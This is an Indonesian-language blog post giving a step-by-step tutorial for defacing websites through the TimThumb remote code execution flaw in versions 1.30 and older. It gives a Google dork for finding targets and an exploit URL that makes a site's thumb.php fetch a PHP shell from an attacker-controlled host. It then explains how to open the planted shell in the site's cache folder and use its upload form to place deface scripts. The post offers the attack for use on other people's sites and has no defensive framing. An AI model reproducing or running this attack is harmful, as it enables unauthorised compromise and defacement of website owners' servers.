-->

Deface Poc Timthumb RCE 1.x.x New Dork 2019

By Monday 18 February 2019 1 Comment

Hai gan, kembali lagi sama mimin yang gans ini ea:v kali ini mimin bakal share tutorial deface poc timthumb rce langsung aja


•Bahan-Bahan

•Shell Backdor
•Script Deface
•Kopi+Usdud:v

Dork : 
inurl:kinheditor (Kembangin)

Exploit : thumb.php?src=http://flickr.com.tukangpomjakarta/shell.php

VULN 1.30 kebawah


1.Dorking seperti biasa di google.com

NB : Dorking di google image.




2.Jika sudah menemukan target kasih exploit di belakang sitenya.
Contoh : site.com/thumb.php?src=http://flickr.com.tukangpomjakarta/shell.php

Lihat Gambar
3.Jika muncul seperti gambar di atas berarti vuln dan bisa di eue:v


4.Kalian lihat tulisan yang di atas exploit tadi, itu adalah shell uploader kita, tinggal kalian tempelkan saja ke sitenya. Contoh : site.com/cache/blablabla.php

Lihat Gambar

5.Jika sudah seperti itu kalian tinggal ambil tulisan "cache/dedot.php" dan pastekan ke target kalian

Lihat Gambar


Dan taraa muncul form uploadernya:v


Aksesnya : site.com/cache/shellkalian.php




Source : https://forum.surabayablackhat.org

1 Response to "Deface Poc Timthumb RCE 1.x.x New Dork 2019"

Silahkan berkomentar secara bijak dan sesuai dengan topik pembahasan

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

SafelinkU | Shorten your link and earn money

Iklan Tengah Artikel 2

loading...

Iklan Bawah Artikel